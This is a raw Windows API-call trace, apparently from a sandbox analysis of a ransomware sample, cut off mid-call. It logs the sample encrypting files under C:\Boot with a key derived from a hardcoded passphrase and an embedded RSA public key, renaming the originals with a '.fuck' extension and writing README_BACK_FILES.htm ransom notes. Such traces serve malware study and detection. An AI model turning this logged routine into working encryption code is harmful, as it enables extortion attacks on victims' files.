0 [0139.907] SetFileAttributesA (lpFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0139.907] DeleteFileA (lpFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui.gsg")) returned 1 [0139.908] MoveFileA (lpExistingFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui.fuck")) returned 0 [0139.909] CryptDestroyHash (hHash=0x27ff658) returned 1 [0139.909] CryptDestroyKey (hKey=0x27ff098) returned 1 [0139.909] CryptReleaseContext (hProv=0x28045d0, dwFlags=0x0) returned 1 [0139.909] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0139.909] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0139.909] GetLastError () returned 0x5 [0139.909] GetFileAttributesA (lpFileName="C:\\\\Boot\\pt-PT\\memtest.exe.mui" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui")) returned 0x20 [0139.909] SetFileAttributesA (lpFileName="C:\\\\Boot\\pt-PT\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0139.909] CreateFileA (lpFileName="C:\\\\Boot\\pt-PT\\memtest.exe.mui" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.910] CreateFileA (lpFileName="C:\\\\Boot\\pt-PT\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0139.910] SetFileAttributesA (lpFileName="C:\\\\Boot\\pt-PT\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0139.910] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x2803998) returned 1 [0139.913] CryptCreateHash (in: hProv=0x2803998, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0139.913] lstrlenA (lpString="wXOntOzByKCSzZplJZPPJFJezMlQm") returned 29 [0139.913] CryptHashData (hHash=0x27ff358, pbData=0x5bcf70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0139.913] CryptDeriveKey (in: hProv=0x2803998, Algid=0x6610, hBaseData=0x27ff358, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff5d8) returned 1 [0139.913] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0139.913] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0139.913] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x2803bb8) returned 1 [0139.914] CryptImportPublicKeyInfo (in: hCryptProv=0x2803bb8, dwCertEncodingType=0x1, pInfo=0x2800a60*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2800a90*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2800a98*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27ff658) returned 1 [0139.915] CryptEncrypt (in: hKey=0x27ff658, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0139.915] CryptEncrypt (in: hKey=0x27ff658, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2803d50*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x2803d50*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0139.915] WriteFile (in: hFile=0x5d54, lpBuffer=0x2803d50*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2803d50*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0139.916] ReadFile (in: hFile=0xffffffff, lpBuffer=0x5c63c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c63c0, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0139.916] CryptEncrypt (in: hKey=0x27ff5d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5c63c0*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x5c63c0*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0139.916] WriteFile (in: hFile=0x5d54, lpBuffer=0x5c63c0*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c63c0*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0139.916] CloseHandle (hObject=0xffffffff) returned 1 [0139.916] CloseHandle (hObject=0x5d54) returned 1 [0139.919] CopyFileA (lpExistingFileName="C:\\\\Boot\\pt-PT\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\pt-PT\\memtest.exe.mui" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0139.923] SetFileAttributesA (lpFileName="C:\\\\Boot\\pt-PT\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0139.923] DeleteFileA (lpFileName="C:\\\\Boot\\pt-PT\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui.gsg")) returned 1 [0140.048] MoveFileA (lpExistingFileName="C:\\\\Boot\\pt-PT\\memtest.exe.mui" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\pt-PT\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui.fuck")) returned 0 [0140.048] CryptDestroyHash (hHash=0x27ff358) returned 1 [0140.048] CryptDestroyKey (hKey=0x27ff5d8) returned 1 [0140.048] CryptReleaseContext (hProv=0x2803998, dwFlags=0x0) returned 1 [0140.048] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0140.048] FindClose (in: hFindFile=0x27ff218 | out: hFindFile=0x27ff218) returned 1 [0140.048] GetFileAttributesA (lpFileName="C:\\\\Boot\\pt-PT\\README_BACK_FILES.htm" (normalized: "c:\\boot\\pt-pt\\readme_back_files.htm")) returned 0xffffffff [0140.049] AreFileApisANSI () returned 1 [0140.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d4b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0140.049] CreateFileW (lpFileName="C:\\\\Boot\\pt-PT\\README_BACK_FILES.htm" (normalized: "c:\\boot\\pt-pt\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0140.050] GetFileType (hFile=0x5d50) returned 0x1 [0140.050] WriteFile (in: hFile=0x5d50, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0140.051] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0140.052] FindFirstFileA (in: lpFileName="C:\\\\Boot\\qps-ploc\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x27ff4d8 [0140.052] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.052] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.052] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0140.052] GetLastError () returned 0x0 [0140.052] GetFileAttributesA (lpFileName="C:\\\\Boot\\qps-ploc\\bootmgr.exe.mui" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui")) returned 0x20 [0140.052] SetFileAttributesA (lpFileName="C:\\\\Boot\\qps-ploc\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0140.052] CreateFileA (lpFileName="C:\\\\Boot\\qps-ploc\\bootmgr.exe.mui" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.053] CreateFileA (lpFileName="C:\\\\Boot\\qps-ploc\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0140.055] SetFileAttributesA (lpFileName="C:\\\\Boot\\qps-ploc\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0140.055] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x2803998) returned 1 [0140.057] CryptCreateHash (in: hProv=0x2803998, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0140.057] lstrlenA (lpString="wXOntOzByKCSzZplJZPPJFJezMlQm") returned 29 [0140.057] CryptHashData (hHash=0x27ff218, pbData=0x5bcd68, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0140.057] CryptDeriveKey (in: hProv=0x2803998, Algid=0x6610, hBaseData=0x27ff218, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff358) returned 1 [0140.057] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0140.057] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0140.057] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x2803dd8) returned 1 [0140.058] CryptImportPublicKeyInfo (in: hCryptProv=0x2803dd8, dwCertEncodingType=0x1, pInfo=0x27ffd60*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27ffd90*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27ffd98*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27feed8) returned 1 [0140.058] CryptEncrypt (in: hKey=0x27feed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0140.058] CryptEncrypt (in: hKey=0x27feed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28045d0*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x28045d0*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0140.058] WriteFile (in: hFile=0x5d54, lpBuffer=0x28045d0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x28045d0*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0140.059] ReadFile (in: hFile=0xffffffff, lpBuffer=0x5c63c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c63c0, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0140.059] CryptEncrypt (in: hKey=0x27ff358, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5c63c0*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x5c63c0*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0140.059] WriteFile (in: hFile=0x5d54, lpBuffer=0x5c63c0*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c63c0*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0140.059] CloseHandle (hObject=0xffffffff) returned 1 [0140.059] CloseHandle (hObject=0x5d54) returned 1 [0140.060] CopyFileA (lpExistingFileName="C:\\\\Boot\\qps-ploc\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\qps-ploc\\bootmgr.exe.mui" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0140.064] SetFileAttributesA (lpFileName="C:\\\\Boot\\qps-ploc\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0140.065] DeleteFileA (lpFileName="C:\\\\Boot\\qps-ploc\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui.gsg")) returned 1 [0140.066] MoveFileA (lpExistingFileName="C:\\\\Boot\\qps-ploc\\bootmgr.exe.mui" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\qps-ploc\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui.fuck")) returned 0 [0140.066] CryptDestroyHash (hHash=0x27ff218) returned 1 [0140.066] CryptDestroyKey (hKey=0x27ff358) returned 1 [0140.066] CryptReleaseContext (hProv=0x2803998, dwFlags=0x0) returned 1 [0140.066] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.066] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0140.066] GetLastError () returned 0x5 [0140.066] GetFileAttributesA (lpFileName="C:\\\\Boot\\qps-ploc\\memtest.exe.mui" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui")) returned 0x20 [0140.067] SetFileAttributesA (lpFileName="C:\\\\Boot\\qps-ploc\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0140.067] CreateFileA (lpFileName="C:\\\\Boot\\qps-ploc\\memtest.exe.mui" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.068] CreateFileA (lpFileName="C:\\\\Boot\\qps-ploc\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0140.068] SetFileAttributesA (lpFileName="C:\\\\Boot\\qps-ploc\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0140.069] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x2803998) returned 1 [0140.071] CryptCreateHash (in: hProv=0x2803998, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0140.071] lstrlenA (lpString="wXOntOzByKCSzZplJZPPJFJezMlQm") returned 29 [0140.071] CryptHashData (hHash=0x27ff218, pbData=0x5bcd68, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0140.071] CryptDeriveKey (in: hProv=0x2803998, Algid=0x6610, hBaseData=0x27ff218, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff5d8) returned 1 [0140.071] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0140.071] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0140.071] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x2803e60) returned 1 [0140.072] CryptImportPublicKeyInfo (in: hCryptProv=0x2803e60, dwCertEncodingType=0x1, pInfo=0x27ffe30*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27ffe60*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27ffe68*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27fef18) returned 1 [0140.072] CryptEncrypt (in: hKey=0x27fef18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0140.072] CryptEncrypt (in: hKey=0x27fef18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2803ee8*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x2803ee8*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0140.072] WriteFile (in: hFile=0x5d54, lpBuffer=0x2803ee8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2803ee8*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0140.073] ReadFile (in: hFile=0xffffffff, lpBuffer=0x5c67c8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0140.073] CryptEncrypt (in: hKey=0x27ff5d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5c67c8*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x5c67c8*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0140.073] WriteFile (in: hFile=0x5d54, lpBuffer=0x5c67c8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0140.073] CloseHandle (hObject=0xffffffff) returned 1 [0140.073] CloseHandle (hObject=0x5d54) returned 1 [0140.074] CopyFileA (lpExistingFileName="C:\\\\Boot\\qps-ploc\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\qps-ploc\\memtest.exe.mui" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0140.079] SetFileAttributesA (lpFileName="C:\\\\Boot\\qps-ploc\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0140.079] DeleteFileA (lpFileName="C:\\\\Boot\\qps-ploc\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui.gsg")) returned 1 [0140.080] MoveFileA (lpExistingFileName="C:\\\\Boot\\qps-ploc\\memtest.exe.mui" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\qps-ploc\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui.fuck")) returned 0 [0140.081] CryptDestroyHash (hHash=0x27ff218) returned 1 [0140.081] CryptDestroyKey (hKey=0x27ff5d8) returned 1 [0140.081] CryptReleaseContext (hProv=0x2803998, dwFlags=0x0) returned 1 [0140.081] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0140.081] FindClose (in: hFindFile=0x27ff4d8 | out: hFindFile=0x27ff4d8) returned 1 [0140.081] GetFileAttributesA (lpFileName="C:\\\\Boot\\qps-ploc\\README_BACK_FILES.htm" (normalized: "c:\\boot\\qps-ploc\\readme_back_files.htm")) returned 0xffffffff [0140.081] AreFileApisANSI () returned 1 [0140.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d2b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0140.081] CreateFileW (lpFileName="C:\\\\Boot\\qps-ploc\\README_BACK_FILES.htm" (normalized: "c:\\boot\\qps-ploc\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0140.082] GetFileType (hFile=0x5d50) returned 0x1 [0140.082] WriteFile (in: hFile=0x5d50, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0140.083] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0140.083] FindFirstFileA (in: lpFileName="C:\\\\Boot\\Resources\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x27fef58 [0140.083] FindNextFileA (in: hFindFile=0x27fef58, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.083] FindNextFileA (in: hFindFile=0x27fef58, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.083] FindNextFileA (in: hFindFile=0x27fef58, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.083] FindFirstFileA (in: lpFileName="C:\\\\Boot\\Resources\\en-US\\*.*", lpFindFileData=0x2c5f160 | out: lpFindFileData=0x2c5f160) returned 0x27ff358 [0140.084] FindNextFileA (in: hFindFile=0x27ff358, lpFindFileData=0x2c5f160 | out: lpFindFileData=0x2c5f160) returned 1 [0140.084] FindNextFileA (in: hFindFile=0x27ff358, lpFindFileData=0x2c5f160 | out: lpFindFileData=0x2c5f160) returned 1 [0140.084] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f070 | out: lpSystemTimeAsFileTime=0x2c5f070) [0140.084] GetLastError () returned 0x0 [0140.084] GetFileAttributesA (lpFileName="C:\\\\Boot\\Resources\\en-US\\bootres.dll.mui" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui")) returned 0x20 [0140.084] SetFileAttributesA (lpFileName="C:\\\\Boot\\Resources\\en-US\\bootres.dll.mui", dwFileAttributes=0x80) returned 0 [0140.084] CreateFileA (lpFileName="C:\\\\Boot\\Resources\\en-US\\bootres.dll.mui" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.085] CreateFileA (lpFileName="C:\\\\Boot\\Resources\\en-US\\bootres.dll.mui.gsg" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0140.085] SetFileAttributesA (lpFileName="C:\\\\Boot\\Resources\\en-US\\bootres.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0140.085] CryptAcquireContextA (in: phProv=0x2c5e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e06c*=0x2803998) returned 1 [0140.190] CryptCreateHash (in: hProv=0x2803998, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e070 | out: phHash=0x2c5e070) returned 1 [0140.190] lstrlenA (lpString="wXOntOzByKCSzZplJZPPJFJezMlQm") returned 29 [0140.190] CryptHashData (hHash=0x27ff4d8, pbData=0x280ea90, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0140.190] CryptDeriveKey (in: hProv=0x2803998, Algid=0x6610, hBaseData=0x27ff4d8, dwFlags=0x1000000, phKey=0x2c5e05c | out: phKey=0x2c5e05c*=0x27ff5d8) returned 1 [0140.190] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e078, pcbBinary=0x2c5e058, 